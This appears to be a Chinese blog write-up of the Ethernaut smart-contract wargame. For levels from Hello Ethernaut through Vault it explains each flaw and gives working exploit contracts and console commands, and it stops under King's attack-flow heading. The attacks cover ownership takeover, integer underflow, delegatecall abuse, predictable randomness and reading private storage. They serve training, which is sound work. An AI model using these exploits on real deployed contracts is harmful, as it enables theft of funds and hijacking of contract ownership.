
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <title>Ethernaut Writeup | 坏孩子のSimple Blogs</title>
    <meta name="author" content="坏孩子" />
    <meta name="description" content="「 尼采 」" />
    <meta name="keywords" content="" />
    <meta
        name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"
    />
    <link rel="icon" href="/images/avatar.jpg" />
    <script type="text/javascript" src="/js/jquery.min.js"></script>
    <link rel="preconnect" href="https://s4.zstatic.net" />
<script src="https://s4.zstatic.net/ajax/libs/vue/3.3.7/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/font-awesome/6.4.2/css/all.min.css" />
<link rel="preconnect" href="https://fonts.googleapis.cn" />
<link rel="preconnect" href="https://fonts.gstatic.cn" crossorigin />
<link
    rel="stylesheet"
    href="https://fonts.googleapis.cn/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap"
/>
<script> const mixins = {}; </script>

<script src="https://polyfill.alicdn.com/v3/polyfill.min.js?features=default"></script>


    <script src="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
    <script
        src="https://s4.zstatic.net/ajax/libs/highlightjs-line-numbers.js/2.8.0/highlightjs-line-numbers.min.js"></script>
    <link rel="stylesheet"
        href="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/styles/github.min.css" />
    <script src="/js/lib/highlight.js"></script>
    


<script src="/js/lib/preview.js"></script>









<link rel="stylesheet" href="/css/main.css" />

    <div id="totop"
    style="position: fixed; bottom: 50px; right: 60px; font-size: 48px; cursor: pointer; z-index: 10; display: block; opacity: 1;">
    <a title="返回顶部">↑</a>
</div>
    <div class="xpand" style="height:200px; position: fixed; bottom: 0; left: 0; z-index: 9999;">
    <canvas class="illo" width="800" height="800" style="max-width: 200px; max-height: 200px; touch-action: none; width: 640px; height: 640px;opacity: 0.5;pointer-events: none;">
</canvas></div>
<script src="https://fastly.jsdelivr.net/gh/xiaopengand/blogCdn@latest/xzxr/twopeople1.js"></script>
<script src="https://fastly.jsdelivr.net/gh/xiaopengand/blogCdn@latest/xzxr/zdog.dist.js"></script>
<script id="rendered-js" src="https://fastly.jsdelivr.net/gh/xiaopengand/blogCdn@latest/xzxr/twopeople.js"></script>
<style>
    canvas {
        display: block;
        margin: auto auto;
        cursor: move;
    }
</style>

    
    <div id="toc" class="toc-article">
        <h3><i class="fas fa-stream"></i> 目录</h3>
        <div class="toc-title"></div>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%A6%82%E8%BF%B0"><span class="toc-number">1.</span> <span class="toc-text">概述</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Hello-Ethernaut"><span class="toc-number">2.</span> <span class="toc-text">Hello Ethernaut</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Fallback"><span class="toc-number">3.</span> <span class="toc-text">Fallback</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Fallout"><span class="toc-number">4.</span> <span class="toc-text">Fallout</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Coin-Flip"><span class="toc-number">5.</span> <span class="toc-text">Coin Flip</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Telephone"><span class="toc-number">6.</span> <span class="toc-text">Telephone</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Token"><span class="toc-number">7.</span> <span class="toc-text">Token</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Delegation"><span class="toc-number">8.</span> <span class="toc-text">Delegation</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Force"><span class="toc-number">9.</span> <span class="toc-text">Force</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Vault"><span class="toc-number">10.</span> <span class="toc-text">Vault</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#King"><span class="toc-number">11.</span> <span class="toc-text">King</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Re-entrancy"><span class="toc-number">12.</span> <span class="toc-text">Re-entrancy</span></a></li></ol>
    </div>
    
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="坏孩子のSimple Blogs" type="application/atom+xml">
</head>
<body>
    <!--flag{H4ve_4_G00d_d4y!!!}-->
    <script src="/js/totop.js"></script>
    <script src="/js/funnytitle.js"></script>
    <script src="/js/zhizhuwang.js"></script>
    <script src="/js/link.js"></script>
    <div id="layout">
        
        <div id="content-background" ref="contentBackground" data-images="/images/content-background.png"></div>
        
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>第一次加载文章图片可能会花费较长时间</p>
                    <p>要不开个代理试试?&nbsp;&nbsp;(x</p>
                    <p>加载过慢请开启缓存 浏览器默认开启</p>
                    <img src="/images/loading.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/">
            <span>坏孩子のSIMPLE BLOGS</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
        <a href="/links">
            <i class="fa-solid fa-link fa-fw"></i>
            <span>&ensp;Links</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;坏孩子のSIMPLE BLOGS</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                    </div>
                </a>
                
                <a href="/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                    </div>
                </a>
                
                <a href="/categories">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-bookmark fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
                <a href="/links">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-link fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Links</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article">
    <div>
        <h1>Ethernaut Writeup</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2024/8/20
        </span>
        
        <span class="category">
            <a href="/categories/Blockchain/">
                <span class="icon">
                    <i class="fa-solid fa-bookmark fa-fw"></i>
                </span>
                Blockchain
            </a>
        </span>
        
        
        <span class="tags">
            <span class="icon">
                <i class="fa-solid fa-tags fa-fw"></i>
            </span>
            
            
            <span class="tag">
                
                <a href="/tags/%E6%99%BA%E8%83%BD%E5%90%88%E7%BA%A6/" style="color: #00bcd4">
                    智能合约
                </a>
            </span>
            
        </span>
        
    </div>
    
    <div class="content" v-pre>
        <h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><p>智能合约（Smart Contract）是以太坊中最为重要的一个概念，即以计算机程序的方式来缔结和运行各种合约。</p>
<p>最早在上世纪 90 年代，Nick Szabo 等人就提出过类似的概念，但一直依赖因为缺乏可靠执行智能合约的环境，而被作为一种理论设计。区块链技术的出现，恰好补充了这一缺陷。</p>
<p>以太坊支持通过图灵完备的高级语言（包括 Solidity、Serpent、Viper）等来开发智能合约。智能合约作为运行在以太坊虚拟机（Ethereum Virual Machine，EVM）中的应用，可以接受来自外部的交易请求和事件，通过触发运行提前编写好的代码逻辑，进一步生成新的交易和事件，并且可以进一步调用其它智能合约。<span id="more"></span></p>
<p>随着区块链技术的兴起，以及智能合约应用越来越广泛，不过大部分还处于功能实现阶段，安全问题也接二连三地暴露出来。我们在进行开发的同时，也要时刻警惕可能出现的安全问题。</p>
<p>Ethernaut是一个基于Web3和Solidity并运行在EVM上的战争游戏，灵感来源于<code>overthewire.org</code>和漫画<code>El Eternauta</code>，以攻克关卡的形式逐步升级，题目质量感觉不错。</p>
<p>官网：<a target="_blank" rel="noopener" href="https://ethernaut.zeppelin.solutions/">https://ethernaut.zeppelin.solutions</a></p>
<p>Github：<a target="_blank" rel="noopener" href="https://github.com/OpenZeppelin/ethernaut">https://github.com/OpenZeppelin/ethernaut</a></p>
<hr>
<h1 id="Hello-Ethernaut"><a href="#Hello-Ethernaut" class="headerlink" title="Hello Ethernaut"></a><strong>Hello Ethernaut</strong></h1><p>关卡要求：</p>
<p>​	本关卡帮助你了解游戏的基本操作。</p>
<p>合约代码：</p>
<pre><code class="solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Instance &#123;
    string public password;
    uint8 public infoNum = 42;
    string public theMethodName = &quot;The method name is method7123949.&quot;;
    bool private cleared = false;

    // constructor
    constructor(string memory _password) &#123;
        password = _password;
    &#125;

    function info() public pure returns (string memory) &#123;
        return &quot;You will find what you need in info1().&quot;;
    &#125;

    function info1() public pure returns (string memory) &#123;
        return &#39;Try info2(), but with &quot;hello&quot; as a parameter.&#39;;
    &#125;

    function info2(string memory param) public pure returns (string memory) &#123;
        if (keccak256(abi.encodePacked(param)) == keccak256(abi.encodePacked(&quot;hello&quot;))) &#123;
            return &quot;The property infoNum holds the number of the next info method to call.&quot;;
        &#125;
        return &quot;Wrong parameter.&quot;;
    &#125;

    function info42() public pure returns (string memory) &#123;
        return &quot;theMethodName is the name of the next method.&quot;;
    &#125;

    function method7123949() public pure returns (string memory) &#123;
        return &quot;If you know the password, submit it to authenticate().&quot;;
    &#125;

    function authenticate(string memory passkey) public &#123;
        if (keccak256(abi.encodePacked(passkey)) == keccak256(abi.encodePacked(password))) &#123;
            cleared = true;
        &#125;
    &#125;

    function getCleared() public view returns (bool) &#123;
        return cleared;
    &#125;
&#125;
</code></pre>
<p>攻击流程：</p>
<pre><code class="solidity">contract.info1()
contract.info2(&quot;hello&quot;) // The property infoNum holds the number of the next info method to call.
contract.infoNum() // 42
contract.info42() // theMethodName is the name of the next method.
contract.theMethodName() // The method name is method7123949.
contract.method7123949() // If you know the password, submit it to authenticate().
contract.password()  // ethernaut0
contract.authenticate(&quot;ethernaut0&quot;)  // 完成此步后,点击submit instance即可过关。
</code></pre>
<hr>
<h1 id="Fallback"><a href="#Fallback" class="headerlink" title="Fallback"></a><strong>Fallback</strong></h1><p>关卡要求：</p>
<ul>
<li><p>成为这个合约的owner</p>
</li>
<li><p>把他的余额减到0</p>
</li>
</ul>
<p>合约代码：</p>
<pre><code class="solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Fallback &#123;
    mapping(address =&gt; uint256) public contributions;
    address public owner;

    constructor() &#123;
        owner = msg.sender;
        contributions[msg.sender] = 1000 * (1 ether);
    &#125;

    modifier onlyOwner() &#123;
        require(msg.sender == owner, &quot;caller is not the owner&quot;);
        _;
    &#125;

    function contribute() public payable &#123;
        require(msg.value &lt; 0.001 ether);
        contributions[msg.sender] += msg.value;
        if (contributions[msg.sender] &gt; contributions[owner]) &#123;
            owner = msg.sender;
        &#125;
    &#125;

    function getContribution() public view returns (uint256) &#123;
        return contributions[msg.sender];
    &#125;

    function withdraw() public onlyOwner &#123;
        payable(owner).transfer(address(this).balance);
    &#125;

    receive() external payable &#123;
        require(msg.value &gt; 0 &amp;&amp; contributions[msg.sender] &gt; 0);
        owner = msg.sender;
    &#125;
&#125;
</code></pre>
<p>攻击流程：</p>
<pre><code class="solidity">await getBlance(instance)  //查看合约地址的资产总量
await contract.contribute(&#123;value:1&#125;)  //向合约转1wei，使贡献值大于0
await getBlance(instance)  //再次获取balance，检查是否成功改变
await contract.sendTransaction(&#123;value:1&#125;)  //通过调用sendTransaction函数来触发fallback函数
//await contract.send(1)
await contract.owner()  //等交易完成后再次查看合约的owner，发现成功变为我们自己的地址
await contract.withdraw()  //调用withdraw来转走合约的所有代币
await getBalance(contract.address);  //检查合约地址
</code></pre>
<hr>
<h1 id="Fallout"><a href="#Fallout" class="headerlink" title="Fallout"></a>Fallout</h1><p>关卡要求：</p>
<p>​	获得合约的所有权</p>
<p>合约代码：</p>
<pre><code class="solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import &quot;openzeppelin-contracts-06/math/SafeMath.sol&quot;;

contract Fallout &#123;
    using SafeMath for uint256;

    mapping(address =&gt; uint256) allocations;
    address payable public owner;

    /* constructor */
    function Fal1out() public payable &#123;
        owner = msg.sender;
        allocations[owner] = msg.value;
    &#125;

    modifier onlyOwner() &#123;
        require(msg.sender == owner, &quot;caller is not the owner&quot;);
        _;
    &#125;

    function allocate() public payable &#123;
        allocations[msg.sender] = allocations[msg.sender].add(msg.value);
    &#125;

    function sendAllocation(address payable allocator) public &#123;
        require(allocations[allocator] &gt; 0);
        allocator.transfer(allocations[allocator]);
    &#125;

    function collectAllocations() public onlyOwner &#123;
        msg.sender.transfer(address(this).balance);
    &#125;

    function allocatorBalance(address allocator) public view returns (uint256) &#123;
        return allocations[allocator];
    &#125;
&#125;
</code></pre>
<p>合约分析：</p>
<p>构造函数名称与合约名称不一致，同时在构造函数中指定了函数调用者直接为合约的owner</p>
<p>旧版 Solidity 的 constructor 需要使用与合约同名的方法来定义，而这里的 <code>Fal1out</code> 和合约名 <code>Fallout</code> 不一致，所以可以说它并不是 constructor，而是一个全局函数，因此可以任意调用。</p>
<p>攻击流程：</p>
<pre><code class="solidity">await contract.owner()
await contract.Fal1out()
await contract.owner()
</code></pre>
<hr>
<h1 id="Coin-Flip"><a href="#Coin-Flip" class="headerlink" title="Coin Flip"></a>Coin Flip</h1><p>关卡要求：</p>
<p>​	这是一个掷硬币的游戏，你需要连续的猜对结果。完成这一关，你需要通过你的超能力来连续猜对十次。</p>
<p>合约代码：</p>
<pre><code class="solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract CoinFlip &#123;
    uint256 public consecutiveWins;
    uint256 lastHash;
    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

    constructor() &#123;
        consecutiveWins = 0;
    &#125;

    function flip(bool _guess) public returns (bool) &#123;
        uint256 blockValue = uint256(blockhash(block.number - 1));

        if (lastHash == blockValue) &#123;
            revert();
        &#125;

        lastHash = blockValue;
        uint256 coinFlip = blockValue / FACTOR;
        bool side = coinFlip == 1 ? true : false;

        if (side == _guess) &#123;
            consecutiveWins++;
            return true;
        &#125; else &#123;
            consecutiveWins = 0;
            return false;
        &#125;
    &#125;
&#125;
</code></pre>
<p>合约分析：</p>
<p><a target="_blank" rel="noopener" href="https://blog.positive.com/predicting-random-numbers-in-ethereum-smart-contracts-e5358c6b8620">随机数问题</a></p>
<p>这题就是用了<code>block.blockhash(block.number-1)</code>，这个表示上一块的hash，然后去除以<code>2^255</code>，使用这种方式生成随机数，是极易被攻击利用的。</p>
<p><img src="https://badboy0.oss-cn-beijing.aliyuncs.com/pictures/202408201038890.png"></p>
<p>如图，一个交易是被打包在一个区块里的，通过攻击合约去调用Lottery合约，那么他们的区块信息都是一样的。所以我们只需要部署一个合约，然后在该合约内调用 CoinFlip 合约的 flip 方法，这样就能保证两个合约获取到的 block.number 完全一致</p>
<p>攻击流程：</p>
<pre><code class="solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract CoinFlip &#123;
    uint256 public consecutiveWins;
    uint256 lastHash;
    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

    constructor() public &#123;
        consecutiveWins = 0;
    &#125;

    function flip(bool _guess) public returns (bool) &#123;
        uint256 blockValue = uint256(blockhash(block.number - 1));

        if (lastHash == blockValue) &#123;
            revert();
        &#125;

        lastHash = blockValue;
        uint256 coinFlip = blockValue / FACTOR;
        bool side = coinFlip == 1 ? true : false;

        if (side == _guess) &#123;
            consecutiveWins++;
            return true;
        &#125; else &#123;
            consecutiveWins = 0;
            return false;
        &#125;
    &#125;
&#125;

contract exploit &#123;
    address public con_addr = 0x3ff811aa4Eb665C960Da7eA0bBD8F2BFdC3Ed448;
    CoinFlip expFlip = CoinFlip(con_addr);
    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

    function guess() public &#123;
        uint256 blockValue = uint256(blockhash(block.number-1));
        uint256 coinFlip = uint256(uint256(blockValue) / FACTOR);
        bool guess = coinFlip == 1 ? true : false;
        expFlip.flip(guess);
    &#125;
&#125;
</code></pre>
<p>部署合约，并点击guess十次</p>
<p><img src="https://badboy0.oss-cn-beijing.aliyuncs.com/pictures/202408201029530.png" alt="image-20240820102856298"></p>
<p>可使用 <code>await contract.consecutiveWins()</code> 来查询成功次数</p>
<p><img src="https://badboy0.oss-cn-beijing.aliyuncs.com/pictures/202408201031124.png" alt="image-20240820103151578"></p>
<hr>
<h1 id="Telephone"><a href="#Telephone" class="headerlink" title="Telephone"></a>Telephone</h1><p>关卡要求：</p>
<p>​	获取合约的owner权限</p>
<p>合约代码：</p>
<pre><code class="solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Telephone &#123;
    address public owner;

    constructor() &#123;
        owner = msg.sender;
    &#125;

    function changeOwner(address _owner) public &#123;
        if (tx.origin != msg.sender) &#123;
            owner = _owner;
        &#125;
    &#125;
&#125;
</code></pre>
<p>合约分析：</p>
<p>这里涉及到了 tx.origin 和 msg.sender 的区别，前者表示交易的发送者，后者则表示消息的发送者（合约的调用者）。</p>
<p>如果情景是在一个合约下的调用，那么这两者是没有区别的，但是如果是在多个合约的情况下，比如用户通过A合约来调用B合约，那么对于B合约来说，msg.sender就代表合约A，而tx.origin就代表用户</p>
<p>例如 <code>A (EOA) -&gt; B (contract) -&gt; C (contract)</code>，那么对于合约 C 来说，tx.origin 为外部账户 A 的地址，而 msg.sender 为合约 B 的地址。</p>
<p>攻击流程：</p>
<pre><code class="solidity">pragma solidity ^0.6.0;

contract Telephone &#123;

  address public owner;

  constructor() public &#123;
    owner = msg.sender;
  &#125;

  function changeOwner(address _owner) public &#123;
    if (tx.origin != msg.sender) &#123;
      owner = _owner;
    &#125;
  &#125;
&#125;

contract exploit &#123;
    Telephone target = Telephone(0x665F3eB49C60fA82E6ccB7D62A4B42627c79481b);

    function attack() public &#123;
        target.changeOwner(0xD81214eEeC8D4d0EC901Bccd932D2cbe47860385);
    &#125;
&#125;
</code></pre>
<hr>
<h1 id="Token"><a href="#Token" class="headerlink" title="Token"></a>Token</h1><p>关卡要求：</p>
<p>​	这一关的目标是攻破下面这个基础 token 合约</p>
<p>​	你最开始有20个 token，如果你通过某种方法可以增加你手中的 token 数量，你就可以通过这一关，当然越多越好</p>
<p>合约代码：</p>
<pre><code class="solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Token &#123;
    mapping(address =&gt; uint256) balances;
    uint256 public totalSupply;

    constructor(uint256 _initialSupply) public &#123;
        balances[msg.sender] = totalSupply = _initialSupply;
    &#125;

    function transfer(address _to, uint256 _value) public returns (bool) &#123;
        require(balances[msg.sender] - _value &gt;= 0);
        balances[msg.sender] -= _value;
        balances[_to] += _value;
        return true;
    &#125;

    function balanceOf(address _owner) public view returns (uint256 balance) &#123;
        return balances[_owner];
    &#125;
&#125;
</code></pre>
<p>合约分析：</p>
<p>Solidity &lt; 0.8 时没有内置 SafeMath 库, 存在经典的整数溢出问题</p>
<p>这里的balances和value都是无符号整数，所以无论如何他们相减之后值依旧大于等于0，那么当我们 <code>_value</code> 大于 <code>balances[msg.sender]</code> 时，<code>balances[msg.sender]</code> 就会下溢，变成一个非常大的数。</p>
<p>攻击流程：</p>
<pre><code class="solidity">pragma solidity ^0.6.0;

contract Token &#123;

  mapping(address =&gt; uint) balances;
  uint public totalSupply;

  constructor(uint _initialSupply) public &#123;
    balances[msg.sender] = totalSupply = _initialSupply;
  &#125;

  function transfer(address _to, uint _value) public returns (bool) &#123;
    require(balances[msg.sender] - _value &gt;= 0);
    balances[msg.sender] -= _value;
    balances[_to] += _value;
    return true;
  &#125;

  function balanceOf(address _owner) public view returns (uint balance) &#123;
    return balances[_owner];
  &#125;
&#125;

contract exploit &#123;
    address public con_addr ;//
    address public trans_to ;//
    Token token = Token(con_addr);
    uint overvalue = 21;

    function attack() public &#123;
        token.transfer(trans_to,overvalue);
    &#125;
&#125;
</code></pre>
<pre><code class="solidity">await contract.totalSupply();  // total supply is 21000000
await contract.balanceOf(player);  // current balance is 20
await contract.transfer(&quot;0x01&quot;, &quot;21&quot;);  // int overflow
(await contract.balanceOf(player)).toString();  // current balance is 115792089237316195423570985008687907853269984665640564039457584007913129639756
</code></pre>
<hr>
<h1 id="Delegation"><a href="#Delegation" class="headerlink" title="Delegation"></a>Delegation</h1><p>关卡要求：</p>
<p>​	这一关的目标是申明你对你创建实例的所有权</p>
<p>合约代码：</p>
<pre><code class="solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Delegate &#123;
    address public owner;

    constructor(address _owner) &#123;
        owner = _owner;
    &#125;

    function pwn() public &#123;
        owner = msg.sender;
    &#125;
&#125;

contract Delegation &#123;
    address public owner;
    Delegate delegate;

    constructor(address _delegateAddress) &#123;
        delegate = Delegate(_delegateAddress);
        owner = msg.sender;
    &#125;

    fallback() external &#123;
        (bool result,) = address(delegate).delegatecall(msg.data);
        if (result) &#123;
            this;
        &#125;
    &#125;
&#125;
</code></pre>
<p>合约分析：</p>
<ul>
<li><p><code>Solidity</code> 支持两种底层调用方式 <strong>call</strong> 和 <strong>delegatecall</strong></p>
<p><strong>call</strong> 外部调用时，上下文是外部合约；<strong>delegatecall</strong> 外部调用时，上下文是调用合约</p>
<p><strong>call</strong> 与 <strong>delegatecall</strong> 的功能类似，区别仅在于后者仅使用给定地址的代码，其它信息则使用当前合约(如存储，余额等等)。</p>
<p>函数的设计目的是为了使用存储在另一个合约的库代码。</p>
<p>二者执行代码的上下文环境的不同，当使用call调用其它合约的函数时，代码是在被调用的合约的环境里执行，对应的，使用delegatecall进行函数调用时代码则是在调用函数的合约的环境里执行。</p>
<p>所以 <code>delegate.delegatecall(msg.data)</code> 其实调用的是 <code>delegate</code> 自身的 <code>msg.data</code></p>
<blockquote>
<p><code>delegatecall</code> is a low level function similar to <code>call</code>.</p>
<p>When contract <code>A</code> executes <code>delegatecall</code> to contract <code>B</code>, <code>B</code>‘s code is executed</p>
<p>with contract <code>A</code>‘s storage, <code>msg.sender</code> and <code>msg.value</code>.</p>
</blockquote>
</li>
<li><p><code>data</code> 头<code>4</code>个 <code>byte</code> 是被调用方法的签名哈希，即 <code>bytes4(keccak256(&quot;func&quot;))</code> , <code>remix</code> 里调用函数，实际是向合约账户地址发送了( <code>msg.data[0:4]</code> &#x3D;&#x3D; 函数签名哈希 )的一笔交易</p>
<p>所以我们只需调用 <code>Delegation</code> 的 <code>fallback</code> 的同时在 <code>msg.data</code> 放入 <code>pwn</code> 函数的签名即可</p>
</li>
<li><p><code>fallback</code> 的触发条件：</p>
<ul>
<li>一是如果合约在被调用的时候，找不到对方调用的函数，就会自动调用 <code>fallback</code> 函数</li>
<li>二是只要是合约收到别人发送的 <code>Ether</code> 且没有数据，就会尝试执行 <code>fallback</code> 函数，此时 <code>fallback</code> 需要带有 <code>payable</code> 标记，否则，合约就会拒绝这个 <code>Ether</code></li>
</ul>
</li>
</ul>
<p>所以，通过转账触发 <code>Delegation</code> 合约的 <code>fallback</code> 函数，同时设置 <code>data</code> 为 <code>pwn</code> 函数的标识符。</p>
<p>攻击流程：</p>
<pre><code class="solidity">//sha3的返回值前两个为0x，所以要切0-10个字符。
await contract.sendTransaction(&#123;data: web3.utils.sha3(&quot;pwn()&quot;).slice(0,10)&#125;);
await contract.owner();
</code></pre>
<hr>
<h1 id="Force"><a href="#Force" class="headerlink" title="Force"></a>Force</h1><p>关卡要求：</p>
<p>​	使合约的余额大于0</p>
<p>合约代码：</p>
<pre><code class="solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Force &#123;/*

                   MEOW ?
         /\_/\   /
    ____/ o o \
  /~____  =ø= /
 (______)__m_m)

*/&#125;
</code></pre>
<p>合约分析：</p>
<p>在以太坊里我们是可以强制给一个合约发送ether的，不管它要不要它都得收下，这是通过<code>selfdestruct</code>函数来实现的，正如他的名字，这是一个自毁函数，当你调用它的时候，它会使该合约无效化并删除该地址的字节码，然后它会把合约里剩余的资金发送给参数所指定的地址，比较特殊的是这笔资金的发送将无视合约的fallback函数，因为我们之前也提到了当合约直接收到一笔不知如何处理的ether时会触发fallback函数，然而selfdestruct的发送将无视这一点。</p>
<p>两种方法</p>
<ul>
<li><p>使用 selfdestruct 强制将某一合约的 balance 转移到目标合约</p>
</li>
<li><p>在目标合约创建前预测其地址, 然后提前往该地址转账</p>
</li>
</ul>
<p>攻击流程：</p>
<pre><code class="solidity">pragma solidity 0.4.20;

contract Force &#123;
    function Force() public payable &#123;&#125;  // 构造函数为payable，那么就能在部署的时候给此合约转账。Value设为 1 wei
    function attack(address _target) public &#123;
        selfdestruct(_target);
    &#125;
&#125;


await getBalance(instance)
</code></pre>
<p><img src="https://badboy0.oss-cn-beijing.aliyuncs.com/pictures/202408201155132.png"></p>
<hr>
<h1 id="Vault"><a href="#Vault" class="headerlink" title="Vault"></a><strong>Vault</strong></h1><p>关卡要求：</p>
<p>​	打开 vault 来通过这一关</p>
<p>合约代码：</p>
<pre><code class="solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Vault &#123;
    bool public locked;
    bytes32 private password;

    constructor(bytes32 _password) &#123;
        locked = true;
        password = _password;
    &#125;

    function unlock(bytes32 _password) public &#123;
        if (password == _password) &#123;
            locked = false;
        &#125;
    &#125;
&#125;
</code></pre>
<p>合约分析：</p>
<p>使用<code>web3.eth.getStorageAt()</code>方法返回一个以太坊地址的指定位置存储内容，借此获得密码内容</p>
<p><img src="https://badboy0.oss-cn-beijing.aliyuncs.com/pictures/202408201206774.png"></p>
<p>解决此问题的关键在于如何查看私有变量。</p>
<p>需要记住的很重要的一点是，将变量标记为私有只会阻止其他合约访问它。标记为私有变量或局部变量的状态变量，仍可被公开访问。</p>
<p>为确保数据是私密的，在将数据放入区块链之前需要对其进行加密。在这种情况下，解密密钥永远不应该在链上发送，因为任何人都能够看到它。</p>
<p>或者也可以在 Etherscan 、getStorageAt 上可以看到题目合约的状态变化。</p>
<p>攻击流程：</p>
<pre><code class="solidity">web3.eth.getStorageAt(contract.address, 1)
//web3.eth.getStorageAt(contract.address, 1, function(x, y) &#123;alert(web3.toAscii(y))&#125;);
contract.unlock(&#39;0x412076657279207374726f6e67207365637265742070617373776f7264203a29&#39;)
await contract.locked() // check locked state
</code></pre>
<hr>
<h1 id="King"><a href="#King" class="headerlink" title="King"></a>King</h1><p>关卡要求：</p>
<p>下面的合约表示了一个很简单的游戏: 任何一个发送了高于目前价格的人将成为新的国王. 在这个情况下, 上一个国王将会获得新的出价, 这样可以赚得一些以太币. 看起来像是庞氏骗局.</p>
<p>这么有趣的游戏, 你的目标是攻破他.</p>
<p>当你提交实例给关卡时, 关卡会重新申明王位. 你需要阻止他重获王位来通过这一关</p>
<p>合约代码：</p>
<pre><code class="solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract King &#123;
    address king;
    uint256 public prize;
    address public owner;

    constructor() payable &#123;
        owner = msg.sender;
        king = msg.sender;
        prize = msg.value;
    &#125;

    receive() external payable &#123;
        require(msg.value &gt;= prize || msg.sender == owner);
        payable(king).transfer(msg.value);
        king = msg.sender;
        prize = msg.value;
    &#125;

    function _king() public view returns (address) &#123;
        return king;
    &#125;
&#125;
</code></pre>
<p>合约分析：</p>
<p>transfer 转账时如果遇到错误会 revert, 根据这个特性可以使得某个恶意合约成为 king, 该合约的 receive 方法始终 revert</p>
<p>这样其他人在获取王位的时候, 题目合约就会将当前转入的金额 transfer 给恶意合约, 而后者始终 revert, 导致整个方法调用无法成功, 也就保留住了王位</p>
<p>只要国王拒绝接收奖励即可一直当国王。那么我们可以部署攻击合约，使用 <code>revert()</code> 占据合约的king不放</p>
<p>攻击流程：</p>
